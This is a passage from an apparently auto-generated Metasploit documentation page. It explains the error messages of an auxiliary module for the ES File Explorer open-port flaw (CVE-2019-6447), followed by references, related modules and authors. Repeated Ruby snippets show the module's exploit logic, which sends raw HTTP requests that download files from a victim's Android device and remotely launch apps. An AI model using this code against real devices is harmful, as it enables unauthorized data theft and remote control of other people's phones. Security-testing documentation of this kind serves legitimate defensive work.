257: 'uri' => datastore['ACTIONITEM'],
258: 'method' => 'GET',
259: 'ctype' => 'application/json',
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
257: 'uri' => datastore['ACTIONITEM'],
258: 'method' => 'GET',
259: 'ctype' => 'application/json',
260: )
261: unless res
262: print_error("#{peer}- Error Connecting")
263: return
264: end
265: unless res.code == 200
266: print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
267: return
<PEER>- Not Vulnerable, Bad Response. File may not be available for download.
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable, Bad Response. File may not be available for download." error message:
261: unless res
262: print_error("#{peer}- Error Connecting")
263: return
264: end
265: unless res.code == 200
266: print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
267: return
268: end
269: path = store_loot('getFile', 'application/octet-stream', target_host, res.body, datastore['ACTIONITEM'])
270: print_good("#{peer}- #{datastore['ACTIONITEM']} saved to #{path}")
271: when action.name == 'APPLAUNCH'
Action item is a path for GETFILE, like com.android.chrome
Here is a relevant code snippet related to the "Action item is a path for GETFILE, like com.android.chrome" error message:
268: end
269: path = store_loot('getFile', 'application/octet-stream', target_host, res.body, datastore['ACTIONITEM'])
270: print_good("#{peer}- #{datastore['ACTIONITEM']} saved to #{path}")
271: when action.name == 'APPLAUNCH'
272: if datastore['ACTIONITEM'].empty?
273: print_error('Action item is a path for GETFILE, like com.android.chrome')
274: end
275: res = send_request_raw(
276: 'uri' => '/',
277: 'method' => 'POST',
278: 'data' => "{ \"command\":appLaunch, \"appPackageName\":#{datastore['ACTIONITEM']} }",
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
277: 'method' => 'POST',
278: 'data' => "{ \"command\":appLaunch, \"appPackageName\":#{datastore['ACTIONITEM']} }",
279: 'ctype' => 'application/json',
280: )
281: unless res
282: print_error("#{peer}- Error Connecting")
283: return
284: end
285: unless res.code == 200
286: print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
287: return
<PEER>- Not Vulnerable, Bad Response. File may not be available for download.
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable, Bad Response. File may not be available for download." error message:
281: unless res
282: print_error("#{peer}- Error Connecting")
283: return
284: end
285: unless res.code == 200
286: print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
287: return
288: end
289: if res.body.include?('NameNotFoundException')
290: print_error("#{peer}- Application #{datastore['ACTIONITEM']} not found on device")
291: return
<PEER>- Application <ACTIONITEM> not found on device
Here is a relevant code snippet related to the "<PEER>- Application <ACTIONITEM> not found on device" error message:
285: unless res.code == 200
286: print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
287: return
288: end
289: if res.body.include?('NameNotFoundException')
290: print_error("#{peer}- Application #{datastore['ACTIONITEM']} not found on device")
291: return
292: elsif res.body.include?('{"result":"0"}')
293: print_good("#{peer}- #{datastore['actionitem']} launched successfully")
294: end
295: end
Go back to menu.
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #11625 Merged Pull Request: es file explorer open port CVE-2019-6447
References
- CVE-2019-6447
- https://www.ms509.com/2016/03/01/es-explorer-vul/
- https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
- https://twitter.com/fs0c131y/status/1085460755313508352
See Also
Check also the following modules related to this module:
- auxiliary/dos/windows/ftp/filezilla_server_port
- auxiliary/admin/upnp/soap_portmapping
- auxiliary/dos/mdns/avahi_portzero
- auxiliary/scanner/misc/sunrpc_portmapper
- auxiliary/scanner/natpmp/natpmp_portscan
- auxiliary/scanner/portmap/portmap_amp
- auxiliary/scanner/portscan/ack
- auxiliary/scanner/portscan/ftpbounce
- auxiliary/scanner/portscan/syn
- auxiliary/scanner/portscan/tcp
- auxiliary/scanner/portscan/xmas
- auxiliary/scanner/sap/sap_router_portscanner
- exploit/windows/ftp/sasser_ftpd_port
- exploit/windows/ftp/turboftp_port
- exploit/windows/ftp/vermillion_ftpd_port
- payload/aix/ppc/shell_find_port
- payload/bsdi/x86/shell_find_port
- payload/bsd/x86/shell_find_port
- payload/linux/ppc64/shell_find_port
- payload/linux/ppc/shell_find_port
- payload/linux/x64/shell_bind_tcp_random_port
- payload/linux/x64/shell_find_port
- payload/linux/x86/shell_bind_tcp_random_port
- payload/linux/x86/shell_find_port
- payload/osx/x86/shell_find_port
- payload/solaris/sparc/shell_find_port
- payload/solaris/x86/shell_find_port
- post/windows/manage/portproxy
- post/windows/recon/outbound_ports
- exploit/unix/webapp/nagios_graph_explorer
Authors
- 小荷才露尖尖角
- moonbocal
- fs0c131y
- h00die
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.